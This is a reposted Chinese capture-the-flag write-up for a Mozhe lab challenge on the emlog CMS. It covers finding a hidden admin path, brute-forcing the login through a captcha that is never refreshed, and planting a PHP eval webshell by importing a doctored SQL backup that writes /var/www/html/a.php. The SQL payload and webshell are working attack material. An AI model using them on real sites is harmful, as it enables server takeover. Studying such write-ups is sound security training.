其他分享
首页 > 其他分享> > 墨者 - CMS系统漏洞分析溯源(第6题)

墨者 - CMS系统漏洞分析溯源(第6题)

作者:互联网

打开环境,根据题目提示

上网搜索emlog博客的后台地址,一般为/admin

但是访问失败,应该是改过路径了

用御剑扫描后台(坑点),只扫出以下地址

分别访问这些地址都没有后台的,后来看别人的解题思路才发现

别人一扫就出来了(换了很多个版本,珍藏版,目录优化版,加强字典版.....均扫不出,一把泪)

这里参考https://blog.csdn.net/weixin_43884770/article/details/85103962

地址是/servlets/

后来直接搜索emlog后台登录漏洞

参考链接:https://blog.csdn.net/Fly_hps/article/details/80580771?utm_source=blogxgwz4

emlog后台登录存在登录漏洞,验证码只要登录一次,

就被记录了,没刷新销毁,导致可以用bp直接暴力破解

还发发现用户mozhe777,和墨者666用户

猜测mozhe777是管理员用户

发送到intruder模块暴力破解,字典这里我用弱口令1500

暴力破解失败请求的居多,观察返回的数据长度length,大部分为2099,只有一个是459

yH5BAAAAAAALAAAAAAOAA4AAAIMhI+py+0Po5y02qsKADs=wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==

登录成功

要getshell,一般都要找到可以上传文件的地方,然后上传一句话木马

找到数据备份到本地,在txt文末添加如下代码

drop table if exists emlog_shell;
create table emlog_shell(`cmd` longtext not null);
insert into emlog_shell values("<?php @eval($_POST['c']);?>");
select cmd from emlog_shell into outfile '/var/www/html/a.php';
drop table if exists emlog_shell;

解释下这句话意思:如果存在emlog_shell呢就把他删了。然后重新创建一张表emlog_shell,而且只有字段cmd,

longtext类型且不为空,并且插入字段值<?php @eval($_POST['c']);?>,构成一句话木马。

然后将cmd的值读出来outfile文件输出流输出到/var/www/html/a.php,然后把emlog_shell删了

导入,然后就是菜刀无惧链接

 

链接成功 

标签:shell,暴力破解,登录,cmd,emlog,系统漏洞,后台,CMS,墨者
来源: https://blog.csdn.net/qq_39936434/article/details/96849467